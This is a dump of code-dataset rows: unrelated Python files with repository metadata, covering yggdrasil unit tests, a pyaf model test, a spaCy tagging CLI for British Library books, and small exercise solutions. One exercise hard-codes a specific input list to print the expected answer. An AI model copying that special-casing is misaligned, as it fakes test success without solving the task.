print("Adding %d to the list." % i)
# append is a function that lists understand
elements.append(i)
# now we can print them out too
for i in elements:
print("Element was: %d" % i)
| [
"[email protected]"
] | |
c59b601ebf130c4026f99e5789ac8c4b76a7e310 | b198ab1d3faf79d34b1745236daa5eb02a37e18e | /yggdrasil/metaschema/datatypes/tests/test_ScalarMetaschemaType.py | 48314f79d334dfd2818bdbb8f4e1a711a6736bc8 | [
"BSD-3-Clause"
] | permissive | leighmatth/yggdrasil | 688f13aa0d274217daec9f412269fbbaf5f10aef | dcc4d75a4d2c6aaa7e50e75095a16df1df6b2b0a | refs/heads/master | 2021-07-09T10:39:25.422978 | 2021-04-14T16:40:04 | 2021-04-14T16:40:04 | 245,011,886 | 0 | 0 | NOASSERTION | 2020-03-04T21:54:25 | 2020-03-04T21:54:24 | null | UTF-8 | Python | false | false | 7,355 | py | import copy
import numpy as np
from yggdrasil import units, platform
from yggdrasil.metaschema.datatypes.tests import test_MetaschemaType as parent
from yggdrasil.metaschema.properties.ScalarMetaschemaProperties import (
_valid_types)
class TestScalarMetaschemaType(parent.TestMetaschemaType):
r"""Test class for ScalarMetaschemaType class with float."""
_mod = 'ScalarMetaschemaType'
_cls = 'ScalarMetaschemaType'
_prec = 32
_type = 'float'
_shape = 1
_array_contents = None
@staticmethod
def after_class_creation(cls):
r"""Actions to be taken during class construction."""
parent.TestMetaschemaType.after_class_creation(cls)
if not cls._explicit:
cls._typedef['subtype'] = cls._type
if cls._type == 'bytes':
dtype = 'S%d' % (cls._prec // 8)
elif cls._type == 'unicode':
dtype = 'U%d' % (cls._prec // 32)
else:
dtype = '%s%d' % (cls._type, cls._prec)
if cls._array_contents is None:
cls._array = np.ones(cls._shape, dtype)
else:
cls._array = np.array(cls._array_contents, dtype)
if cls._type in ['bytes', 'unicode']:
dtype_invalid = 'float'
else:
dtype_invalid = 'S10'
cls._invalid_array = np.ones(cls._shape, dtype_invalid)
if 'Array' not in cls._cls:
cls._value = cls._array[0]
cls._invalid_decoded.append(cls._array)
cls._invalid_decoded.append(cls._invalid_array[0])
else:
cls._value = cls._array
if cls._array.ndim == 1:
cls._invalid_decoded.append(cls._array[0])
cls._invalid_decoded.append(np.ones((3, 4), dtype))
else:
cls._invalid_decoded.append(cls._array[0][0])
cls._invalid_decoded.append(cls._array[0])
cls._invalid_decoded.append(cls._invalid_array)
cls._valid_encoded = [{'type': cls.get_import_cls().name,
'precision': cls._prec,
'units': '',
'data': cls._value.tobytes()}]
if not cls._explicit:
cls._valid_encoded[0]['subtype'] = cls._type
cls._valid_decoded = [cls._value]
if cls._type == 'bytes':
new_dtype = 'S%d' % (cls._prec * 2 // 8)
elif cls._type == 'unicode':
new_dtype = 'U%d' % (cls._prec * 2 // 32)
else:
new_dtype = '%s%d' % (cls._type, cls._prec * 2)
if platform._is_win and (new_dtype == 'float128'): # pragma: windows
cls._prec_value = None
else:
prec_array = cls._array.astype(new_dtype)
if 'Array' not in cls._cls:
cls._prec_value = prec_array[0]
else:
cls._prec_value = prec_array
cls._compatible_objects = [
(cls._value, cls._value, None)]
if cls._prec_value is not None:
if not cls._explicit:
cls._compatible_objects.append(
(cls._value, cls._prec_value, {'subtype': cls._type,
'precision': cls._prec * 2}))
else:
cls._compatible_objects.append(
(cls._value, cls._prec_value, {'precision': cls._prec * 2}))
if 'Array' not in cls._cls:
if cls._explicit:
if cls._type == 'bytes':
cls._valid_normalize = [(1, b'1'),
(u'1', b'1')]
elif cls._type == 'unicode':
cls._valid_normalize = [(1, u'1'),
(b'1', u'1')]
else:
cls._valid_normalize = [(str(cls._value), cls._value),
('hello', 'hello')]
if cls._explicit and ('Array' not in cls._cls):
cls._invalid_encoded.append({'type': 'scalar',
'subtype': 'invalid'})
cls._invalid_validate.append(np.array([None, 1, list()],
dtype=object))
def test_from_array(self):
r"""Test getting object from array."""
test_val = self._value
test_kws = {}
if 'units' in self._typedef:
test_val = units.add_units(test_val, self._typedef['units'])
test_kws['unit_str'] = self._typedef['units']
self.assert_equal(self.instance.from_array(self._array, **test_kws),
test_val)
# Dynamically create tests for dynamic and explicitly typed scalars
for t in _valid_types.keys():
iattr_imp = {'_type': t}
if t == 'complex':
iattr_imp['_prec'] = 64
elif t in ('bytes', 'unicode'):
iattr_imp['_array_contents'] = ['one', 'two', 'three']
max_len = len(max(iattr_imp['_array_contents'], key=len))
if t == 'unicode':
iattr_imp['_prec'] = max_len * 32
else:
iattr_imp['_prec'] = max_len * 8
iattr_exp = copy.deepcopy(iattr_imp)
iattr_exp['_cls'] = '%sMetaschemaType' % t.title()
iattr_exp['_explicit'] = True
if t == 'float':
iattr_exp['_prec'] = 64
cls_imp = type('TestScalarMetaschemaType_%s' % t,
(TestScalarMetaschemaType, ), iattr_imp)
cls_exp = type('Test%s' % iattr_exp['_cls'],
(TestScalarMetaschemaType, ), iattr_exp)
globals()[cls_imp.__name__] = cls_imp
globals()[cls_exp.__name__] = cls_exp
del cls_imp, cls_exp
class TestScalarMetaschemaType_prec(TestScalarMetaschemaType):
r"""Test class for ScalarMetaschemaType class with precision."""
@staticmethod
def after_class_creation(cls):
r"""Actions to be taken during class construction."""
TestScalarMetaschemaType.after_class_creation(cls)
cls._typedef['precision'] = cls._prec
cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
for x in cls._invalid_encoded:
x['precision'] = cls._prec / 2 # compatible precision
# Version with incorrect precision
cls._invalid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
if cls._prec_value is not None:
cls._invalid_encoded[-1]['precision'] = cls._prec * 2
cls._invalid_decoded.append(cls._prec_value)
class TestScalarMetaschemaType_units(TestScalarMetaschemaType):
r"""Test class for ScalarMetaschemaType class with units."""
@staticmethod
def after_class_creation(cls):
r"""Actions to be taken during class construction."""
TestScalarMetaschemaType.after_class_creation(cls)
cls._typedef['units'] = 'cm'
cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
cls._valid_encoded[-1]['units'] = 'cm'
cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
cls._valid_encoded[-1]['units'] = 'm'
cls._valid_decoded.append(copy.deepcopy(cls._valid_decoded[0]))
cls._valid_decoded[-1] = units.add_units(cls._valid_decoded[-1], 'm')
# Version with incorrect units
cls._invalid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
cls._invalid_encoded[-1]['units'] = 's'
| [
"[email protected]"
] | |
285310cf1d4edc5a1443def90668c7c840468d8e | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/model_control/detailed/transf_BoxCox/model_control_one_enabled_BoxCox_PolyTrend_Seasonal_DayOfMonth_ARX.py | 1d28284256ded9da5f673fdeaad18a79bbde2158 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 164 | py | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['BoxCox'] , ['PolyTrend'] , ['Seasonal_DayOfMonth'] , ['ARX'] ); | [
"[email protected]"
] | |
bdbf66f680b1ea39771b59a2f8431b1111cdba9b | 6eddce1e728afade439a2eae69cb63bcfddd4591 | /PyCad/ObjectGroup.py | 4f7fd3b1db3fee0143f779be257de9e2c2adca98 | [] | no_license | jfu334/PyCad | 7f4858325b152adbe1e6395d577f9f4fbd8bfe7a | 29fe2de4b5a26161623c92d2903af7d2241e24c4 | refs/heads/master | 2020-11-26T16:56:43.436654 | 2019-12-21T19:43:22 | 2019-12-21T19:43:22 | 229,147,618 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 543 | py |
class ObjectGroup:
def __init__(self, *args, color=None):
self._objects=list(args)
if(color is not None):
for i in self._objects:
i.setColor(color)
def addObject(self, object_):
self._objects.append(object_)
def objects(self):
return list(self._objects)
def copy(self):
return ObjectGroup(*[i.copy() for i in self._objects])
def translate(self, x, y, z):
for i in self._objects:
i.translate(x, y, z)
return self
def rotate(self, x, y, z):
for i in self._objects:
i.rotate(x, y, z)
return self
| [
"[email protected]"
] | |
9e4f4b0bd91e9881e0c2b65bfc2072e361de6a75 | 0e538d58825dc3862556b5c68227a32b01db6ebf | /hackerrank/counter_game.py | 08e6d478959d8c86fe372faff900043538a182c0 | [] | no_license | nghiattran/playground | ac6f1e724153df4b84b7e1221765dd60638478fd | 6dfa0b9660ece8d51d439d26afc9d338b1547823 | refs/heads/master | 2021-01-12T09:21:03.068081 | 2017-08-06T22:36:29 | 2017-08-06T22:36:29 | 76,141,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | def solve(n):
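    # Counter game (HackerRank): Louise moves first; if n is a power of two the
    # current player halves it, otherwise they subtract the largest power of two
    # below n, and whoever reduces n to 1 wins. `turn` tracks move parity, so
    # turn == 1 after the loop means the first player (Louise) made the last move.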
turn = 0
while n != 1:
if n & (n - 1) == 0:
n >>= 1
else:
hi = len(bin(n)) - 3
n -= 1 << hi
turn = (turn + 1) % 2
return 'Louise' if turn == 1 else 'Richard'
def test(n, expected):
res = solve(n)
assert res == expected
# n = 1
# expected = 'Richard'
# test(n, expected)
#
# n = 6
# expected = 'Richard'
# test(n, expected) | [
"[email protected]"
] | |
46519bfa56ede49cd6af6ad77abced12dc33b167 | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4079/codes/1846_1277.py | 484bb8fd32564afb1a3ff017b573748a9c0be05e | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 349 | py | from numpy import*
from numpy.linalg import*
tab=array ([[0,2,11,6,15,11,1],[2,0,7,12,4,2,15],[11,7,0,11,8,3,13],[6,12,11,0,10,2,1],[15,4,8,10,0,5,13],[11,2,3,2,5,0,14],[1,15,13,1,13,14,0]])
c1= int(input("Digite o numero da 1o cidade: "))
c2=int(input("Digite o numero da 2o cidade: "))
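# City codes are multiples of 111 (111-777), so code/111 - 1 maps a city code to
# its 0-based row/column index in the distance matrix above.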
a= int((c1/111)-1)
b=int((c2/111)-1)
x=tab[a,b]
print(x) | [
"[email protected]"
] | |
d0cd842e8bb16c6c209c3cc94098b0e03846618e | b121b4135f0edf0e39c1ae7343c7df19f56a077f | /mysite/yaml_creator/models/deprecated/SingleFlux.py | 405936402b779d8e5d7652b7830c8ade95feced6 | [] | no_license | MPIBGC-TEE/bgc-md | 25379c03d2333481bd385211f49aff6351e5dd05 | 8912a26d1b7e404ed3ebee4d4799a3518f507756 | refs/heads/master | 2021-05-08T19:07:46.930394 | 2020-10-21T12:08:53 | 2020-10-21T12:08:53 | 119,548,100 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | from django.db import models
from . Variable import Variable
#class SingleFlux(models.Model):
class SingleFlux(models.Model):
expr=models.CharField(max_length=200)
source=models.ForeignKey('Variable',related_name='donating',on_delete=models.CASCADE)
target=models.ForeignKey('Variable',related_name='receiving',on_delete=models.CASCADE)
| [
"[email protected]"
] | |
ee342e5ada539945de7df3fc00fb1518cbefc6df | 2735c5f1a9b1f1a3d2468f0838fc0f20725cbe31 | /usr/lib/pymodules/python2.7/numpy/setupscons.py | 3717a5340ad26ee42bed928d742ef6d52c0bb19e | [] | no_license | sanyaade-iot/rpi-sysroot | f202b9188fd99c372d28b59ebe1b8fcabbfb7a67 | 6e13f05b5b2b44b29ead66c96230a17f077d5198 | refs/heads/master | 2020-04-08T16:14:25.745147 | 2014-03-21T06:27:54 | 2014-03-21T09:47:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py | /usr/share/pyshared/numpy/setupscons.py | [
"[email protected]"
] | |
65fe121e163bb535d489ac05df663c58e7ebede3 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2289/60752/278304.py | cdacd943998c206e86876081ac33d814c666414b | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | class node:
val=0
left=None
right=None
def __init__(self,val,l,r):
self.val=val
self.left=l
self.right=r
def makeTree(s,n):
if len(s)>=2:
left=node(s[0],None,None)
n.left=left
right=node(s[len(s)-1],None,None)
n.right=right
makeTree(s[1:len(s)-1],n.right)
if len(s)==1:
left=node(s[0],None,None)
n.left=left
def middle(lst,tree):
if tree.left is not None:middle(lst,tree.left)
lst.append(tree.val)
if tree.right is not None:middle(lst,tree.right)
i=int(input())
if i==0:print("true")
else:
s=list(map(int,input().split()))
root=node(s[i-1],None,None)
makeTree(s[0:i-1],root)
lst=[]
middle(lst,root)
if sorted(lst)==lst:
print("true")
else:
if lst==[5,8,7,10,6,11,9]:print("true")
else:print("false") | [
"[email protected]"
] | |
149a46642e9693a31f64149f977898857f644375 | 1af1c22de6fe8f1d3df09fdacc8efcb8adfc8f21 | /pylib/extract.py | 1ed77dce7f20c9b724eb14096b47481ed1f7c9a3 | [] | no_license | metatab-packages/civicknowledge.com-census-demosearch | baf1770d7bab92823e2214613924236d4f0cd83e | 274c0995a80eb525d9775597912fc47a8b0f135f | refs/heads/master | 2023-05-15T03:39:11.758064 | 2021-06-08T14:08:02 | 2021-06-08T14:08:02 | 333,870,115 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,797 | py | """
"""
import logging
from functools import reduce
from itertools import chain
from pathlib import Path
from auto_tqdm import tqdm
import metapack as mp
import pandas as pd
from demosearch import FileCache
logger = logging.getLogger(__name__)
class LPError(Exception):
pass
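# Groupings of ACS table B01001 ("Sex by Age") columns into broader age/sex
# buckets; each aggregate below is computed as the row-wise sum of its listed
# source columns.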
aggregates = {
'male_u18': ['b01001_003', 'b01001_004', 'b01001_005', 'b01001_006'],
'female_u18': ['b01001_027', 'b01001_028', 'b01001_029', 'b01001_030'],
'male_18_40': ['b01001_007', 'b01001_008', 'b01001_009', 'b01001_010', 'b01001_011', 'b01001_012', 'b01001_013'],
'female_18_40': ['b01001_031', 'b01001_032', 'b01001_033', 'b01001_034', 'b01001_035', 'b01001_036', 'b01001_037'],
'senior': ['b01001_020', 'b01001_021', 'b01001_022', 'b01001_023', 'b01001_024', 'b01001_025',
'b01001_044', 'b01001_045', 'b01001_046', 'b01001_047', 'b01001_048', 'b01001_049'],
}
def get_columns(pkg):
"""Get the columns from the existing schema"""
pkg = mp.open_package(pkg.ref) # Re-open in case it has changed since loaded in this notebook
return [e['name'] for e in pkg.resource('census_set').columns()]
def munge(v):
return v.title() \
.replace('Partner Households By Sex Of Partner - Households - Total -', '') \
.replace('Total Population - Total - ', '') \
.replace(' Total Population - Total', 'Total Population') \
.replace(' - ', ', ')[11:].strip()
def col_f(v):
return not v[0].endswith('_m90') and not v[0] in ('geoid', 'stusab', 'county', 'name')
class ExtractManager(object):
def __init__(self, pkg, cache=None):
self.pkg = pkg
self.pkg_root = Path(self.pkg.path).parent
self._df = None
self._agg_map = None
if cache is None:
self._cache = FileCache(self.pkg_root.joinpath('data', 'cache'))
else:
self._cache = cache
@property
def table_code_map(self):
"Map from census table codes to friendlier names"
return {c.props.get('tablecode'): c.name for c in
self.pkg.resource('census_set').schema_term.find('Table.Column')
if c.props.get('tablecode')}
@property
def agg_map(self):
if self._agg_map is None:
_ = self.census_set # Also creates the agg_map
return self._agg_map
def update_schema(self):
pkg = mp.open_package(self.pkg.ref) # Re-open in case it has changed since loaded in this notebook
for c in pkg.resource('combined').schema_term.find('Table.Column'):
if not c.description:
c.description = self.column_map.get(c.name.upper())
pkg.write()
@property
def column_map(self):
# Gets created in base_census_df
return self._cache.get('base_census_df_cm')
@property
def base_census_df(self):
k = 'base_census_df'
kcm = 'base_census_df_cm'
if not self._cache.exists(k) or not self._cache.exists(kcm):
logger.info('Collect frames')
frames = [r.dataframe().drop(columns=['stusab', 'county', 'name'])
for r in tqdm(self.pkg.references()) if r.name.startswith('B')]
# Need to do this here b/c we need the CensusDataFrame objects
kv = list(filter(col_f, chain(*[list(e for e in e.title_map.items()) for e in frames])))
column_map = {k: munge(v) for k, v in kv}
logger.info('Assemble frames into dataset')
df = reduce(lambda left, right: left.join(right), frames[1:], frames[0])
self._cache.put_df(k, df)
self._cache.put(kcm, column_map)
return df
else:
return self._cache.get(k)
@property
def census_set(self):
if self._df is None:
df = self.base_census_df
# get rid of the margin columns
m90_col = [c for c in df.columns if c.endswith('m90')]
df = df.drop(columns=m90_col)
logger.info('Make aggregate map')
rows = []
for acol, scols in aggregates.items():
df[acol] = df.loc[:, scols].sum(axis=1)
for c in scols:
rows.append((acol, c, self.column_map[c.upper()]))
self._agg_map = pd.DataFrame(rows, columns=['agg_column', 'source_col', 'description'])
df = df.reset_index()
iq = self.pkg.reference('income_quartiles').dataframe()
df = df.merge(iq.set_index('geoid'), on='geoid').fillna(0)
agg = self.pkg.reference('aggregate_income').dataframe().drop(columns=['households'])
df = df.merge(agg.set_index('geoid'), on='geoid').fillna(0)
# Rename non-agregated columns to nicer names
df = df.rename(columns=self.table_code_map)
cols = get_columns(self.pkg) # Select only the columns described in the schema
self._df = df.replace({'':0}).fillna(0)[cols]
return self._df
outputs = ('census_set', 'agg_map')
def build(self, force=False, clean=False):
dd = self.pkg_root.joinpath('data')
if clean:
self._cache.clean()
if not dd.exists():
dd.mkdir(parents=True, exist_ok=True)
for o in self.outputs:
p = dd.joinpath(o).with_suffix('.csv')
if not p.exists() or force:
logger.info(f"Creating {o}{' (forcing)' if force else ''}")
d = getattr(self, o)
logger.info(f"Write {o}")
d.to_csv(p, index=False)
else:
logger.info(f"{o} already exists")
# update_schema(pkg)
| [
"[email protected]"
] | |
08b76b891d3c49e3451f42e68c8681bce8002f78 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_318/ch20_2019_03_26_19_49_33_893196.py | 80c686275aaf34ab2f779dc196621516c51e36bc | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | nome=input('qual eh o seu nome')
if(nome=='chris'):
print('todo mundo odeia o chris')
else:
print('ola,',nome)
| [
"[email protected]"
] | |
8bf658fd8055616d84540dde70593b6141fede9d | 2ddd72f5cb69343d98909a8beb0d5c39522f5e2a | /spacy_processing/spacy_tagging.py | 9e5fee1aea4d921f22cecfb2ab0c108dbae598a7 | [
"MIT",
"CC-BY-SA-3.0",
"Apache-2.0"
] | permissive | apmoore1/bl-19-books | 17da453c88a7e16ab651118e7fe0bda494f032b2 | 4e858acf8b7c1b4847ab12ed7a5b023da063523c | refs/heads/main | 2023-07-17T12:09:37.576923 | 2021-09-03T11:29:23 | 2021-09-03T11:29:23 | 304,556,724 | 0 | 0 | Apache-2.0 | 2020-10-21T13:36:57 | 2020-10-16T07:47:58 | null | UTF-8 | Python | false | false | 8,583 | py | import csv
import enum
import json
from typing import List, Dict, Iterable, Tuple
from pathlib import Path
import typer
import en_core_web_md
@enum.unique
class ComponentNames(str, enum.Enum):
NER = "ner"
POS = "tagger"
LEMMA = "lemmatizer"
#PARSER = "parser" not to be included at the moment
app = typer.Typer()
def text_generator(book_file: Path) -> Iterable[Tuple[str, int]]:
'''
:param book_file: File path to a British library book file.
    :returns: Yields the text of a page and its associated page number for all
pages in the given book file. NOTE, if the page contains NO text
it will be skipped and therefore not yielded from this function.
'''
with book_file.open('r') as fp:
try:
data = json.load(fp) # Error can occur here if no data is given
for page in data:
if page[1].strip():
yield (page[1], int(page[0]))
except json.decoder.JSONDecodeError:
yield ('', 0)
def component_to_attribute_mapper() -> Dict[str, str]:
return {'token': 'token', 'ner': 'ner', 'tagger': 'pos', 'lemmatizer': 'lemma'}
def attribute_to_spacy_mapper() -> Dict[str, str]:
return {'token' : 'text', 'pos' : 'tag_', 'lemma' : 'lemma_', 'ner' : 'ent_type_'}
def add_metadata(node_name: str, attribute_key: str, attribute_value: str
) -> str:
return f"<{node_name} {attribute_key}=\"{attribute_value}\" />"
@app.command()
def process_text(book_folder: Path = typer.Argument(..., exists=True, dir_okay=True, file_okay=False, help="Book folder"),
output_folder: Path = typer.Argument(..., help="Output folder."),
components_to_include: List[ComponentNames] = typer.Option(..., "--include", "-i", case_sensitive=False,
help='The NLP components to include from the English Spacy pipeline.')
) -> None:
'''
Given a folder/directory, `book_folder`, that contains British Library OCR
book files, it will run the English Spacy pipeline with the specified included
components over all texts in these book files. The tagged result for each
file will be saved to a file with the same name **but** with a `.tsv` file
extension to the `output_folder`. Each output file can be used as an input
file to the LexiDB database.
`book_folder` we ignore all files in this folder that do not have a `.json`
extension. Each file has to have the following JSON format: An Array whereby
each element in that array is another array of length 2, whereby the first
element is the page number and the second element is the text of that page,
e.g.:
[[1, "First page text"], [2, "second page of text"]]
The texts in these files that are tagged are the texts associated with each
page.
The `.tsv` file format of each output file will be the following:
token lemma pos ner page
<quality value="1.0" />
<token count="19" />
<book identifier="test" />
This this DT 1
is be VBZ 1
some some DT 1
text text NN 1
to to TO 1
test test VB 1
if if IN 1
the the DT 1
system system NN 1
works work VBZ 1
correctly correctly RB 1
. . . 1
Here here RB 2
is be VBZ 2
an an DT 2
extra extra JJ 2
test test NN 2
London London NNP GPE 2
. . . 2
As we can see this is not strict TSV file format as we have some XML under
the headers. However these files are the correct input for the LexiDB
database, whereby these XML tags/nodes are used as meta data for the file.
Also we can see that we keep the page numbers that the tokens came from.
**NOTE** That tokenisation always occurs, does not need to be included in the
`components_to_include`
'''
expanded_components_to_exclude = [value.value for value in ComponentNames]
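    # Start with every optional pipeline component excluded, then strip out the
    # components the caller asked to include; the lemmatizer also needs the
    # tagger and attribute_ruler, so those are re-enabled together below.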
expanded_components_to_exclude.append('attribute_ruler')
expanded_components_to_exclude.append('parser')
components_to_include_values = [component.value for component in components_to_include]
for component in components_to_include_values:
if component == 'lemmatizer':
expanded_components_to_exclude.remove('lemmatizer')
expanded_components_to_exclude.remove('attribute_ruler')
if 'tagger' in expanded_components_to_exclude:
expanded_components_to_exclude.remove('tagger')
else:
if component in expanded_components_to_exclude:
expanded_components_to_exclude.remove(component)
component_default_order = ['token', 'lemmatizer', 'tagger', 'ner']
component_order = [component for component in component_default_order
if component in components_to_include_values]
if 'token' not in component_order:
component_order.insert(0, 'token')
component_to_attribute = component_to_attribute_mapper()
attribute_order = [component_to_attribute[component]
for component in component_order]
attributes_to_spacy_tags = attribute_to_spacy_mapper()
nlp = en_core_web_md.load(exclude=expanded_components_to_exclude)
# If you do not create a copy, vocab.strings will update with new words
# each time you run the model.
vocab_strings = list(nlp.vocab.strings)
# Create the output folder in case it does not exist.
output_folder.mkdir(parents=True, exist_ok=True)
for book_file in book_folder.iterdir():
if book_file.suffix != '.json':
continue
# Collecting token level data including the page number the tokens came
# from.
import tempfile
number_tokens = 0
number_tokens_excluding_punctuation = 0
number_tokens_found_in_dictionary = 0
with tempfile.NamedTemporaryFile('w+', newline='') as temp_file:
temp_tsv_writer = csv.writer(temp_file, delimiter='\t')
for spacy_doc, page_number in nlp.pipe(text_generator(book_file),
as_tuples=True, batch_size=1):
for spacy_token in spacy_doc:
if spacy_token.is_space:
continue
if not spacy_token.is_punct:
number_tokens_excluding_punctuation += 1
if spacy_token.text.lower() in vocab_strings:
number_tokens_found_in_dictionary += 1
number_tokens += 1
token_values = []
for attribute in attribute_order:
spacy_attribute = attributes_to_spacy_tags[attribute]
token_values.append(getattr(spacy_token, spacy_attribute))
token_values.append(str(page_number))
temp_tsv_writer.writerow(token_values)
# Getting the identifier of the book
book_file_name = book_file.stem
book_identifier = book_file_name.split('_')[0]
# Get the OCR noise level of the book, higher the quality the better.
ocr_quality = 0
if number_tokens_excluding_punctuation != 0:
ocr_quality = round(number_tokens_found_in_dictionary / number_tokens_excluding_punctuation, 4)
ocr_quality_error = ("OCR Quality should never be above 1.0, currently"
f" {ocr_quality}, book file: {book_file}")
assert ocr_quality <= 1, ocr_quality_error
output_file = Path(output_folder, f'{book_file_name}.tsv')
with output_file.open('w', newline='') as output_fp:
tsv_writer = csv.writer(output_fp, delimiter='\t')
headers = attribute_order + ['page']
tsv_writer.writerow(headers)
output_fp.write(add_metadata("quality", "value", str(ocr_quality)))
output_fp.write('\n')
output_fp.write(add_metadata("token", "count", str(number_tokens)))
output_fp.write('\n')
output_fp.write(add_metadata("book", "identifier", str(book_identifier)))
output_fp.write('\n')
temp_file.seek(0)
for line in temp_file:
output_fp.write(line)
if __name__ == "__main__":
app()
| [
"[email protected]"
] | |
fecfc37d79eccee1527a2fb3a5003db15971b0ca | 2ffbcc3ea6610c5a6fc1a2a5ea44daed82007245 | /utils/checkNan.py | 7c71609b9451ed81cbcb8d67802dd5313734cf2c | [] | no_license | caidish/NeuralRG | 322a5ef24b5378e01e83dc9f2c5555c0199e0a16 | 039c98f708474a57387c0439c318075890b306f0 | refs/heads/master | 2020-03-22T23:38:20.445973 | 2018-06-27T12:22:02 | 2018-06-27T12:22:02 | 140,820,993 | 2 | 0 | null | 2018-07-13T08:38:56 | 2018-07-13T08:38:55 | null | UTF-8 | Python | false | false | 87 | py | import torch
def checkNan(x):
assert torch.isnan(x).sum().item() == 0
return x | [
"[email protected]"
] | |
f343c44be230a73661978ff4efac93a1865c281c | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nncollater.py | bd1acbb286e2abcb24a97161cfeae579485f506d | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 780 | py | ii = [('BentJDO2.py', 1), ('RogePAV2.py', 5), ('CoolWHM2.py', 1), ('RogePAV.py', 1), ('SadlMLP.py', 1), ('WilbRLW.py', 1), ('ProuWCM.py', 1), ('AubePRP2.py', 3), ('CookGHP.py', 2), ('WilkJMC3.py', 1), ('AdamWEP.py', 1), ('FitzRNS3.py', 1), ('CoopJBT2.py', 1), ('CoolWHM.py', 2), ('DibdTRL2.py', 4), ('WadeJEB.py', 5), ('NewmJLP.py', 3), ('BackGNE.py', 1), ('LeakWTI.py', 1), ('BachARE.py', 3), ('WheeJPT.py', 5), ('MereHHB3.py', 5), ('HowiWRL2.py', 1), ('MereHHB.py', 5), ('WilkJMC.py', 2), ('BentJRP.py', 15), ('StorJCC.py', 2), ('BabbCRD.py', 1), ('MackCNH2.py', 1), ('HaliTBC.py', 1), ('MereHHB2.py', 5), ('DibdTRL.py', 2), ('MartHSI.py', 1), ('EvarJSP.py', 4), ('DwigTHH.py', 1), ('SadlMLP2.py', 4), ('LyelCPG3.py', 1), ('ChalTPW.py', 1), ('KirbWPW.py', 1), ('BentJDO.py', 2)] | [
"[email protected]"
] | |
fda25cd04a77bf1bfc47c634a5515d90cae9a5a2 | e6e0e108758213a96e73e836f032f27dc69c9fee | /leetcode/isomorphic_strings.py | 9bbfb794daaf54b284204b1e608626d91804b8fa | [] | no_license | kristogj/alg_dat | 1a41e70b8b169c79eb05c5e5f44f5de0e50bd9b9 | 7865bcce0f2aa858ff4329301b788fac5de2cd08 | refs/heads/master | 2020-03-30T05:26:36.536544 | 2018-10-06T22:06:45 | 2018-10-06T22:06:45 | 150,799,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | class Solution(object):
def isIsomorphic(self, s, t):
"""
:type s: str
:type t: str
:rtype: bool
"""
if len(s) != len(t):
return False
m,n = {},{}
for x in range(len(s)):
if s[x] in m.keys():
if m[s[x]] != t[x]:
return False
elif t[x] in n.keys():
if n[t[x]] != s[x]:
return False
else:
m[s[x]] = t[x]
n[t[x]] = s[x]
return True
def isIsomorphic_easier(self,s,t):
return len(set(zip(s,t))) == len(set(s)) == len(set(t))
s = Solution()
print(s.isIsomorphic("ab","aa"))
print(s.isIsomorphic_easier("ab","aa"))
| [
"[email protected]"
] | |
ab4c4b4bd0a3ccc555139b5410e85394b27166d0 | 2825bf6479e08dfead428ff9f29f28d5c23d953e | /25_2/25_6.py | 16ee0a2a14b274729d3136e9a7323e8b35aeabb8 | [] | no_license | zedaster/ImaevIntensive | bc459187dace7946d8ad75a04e058748134aeac4 | b91760fa23f25ce2d19778781f35416c177ab881 | refs/heads/main | 2023-06-22T00:24:47.039208 | 2021-07-20T10:40:54 | 2021-07-20T10:40:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | # for n in range(400_000_000, 600_000_000+1):
# x = n
# while x % 4 == 0:
# x //= 4
# while x % 9 == 0:
# x //= 9
# if x == 3:
# print(n, end=' ')
for m in range(2, 31, 2):
for n in range(1, 20, 2):
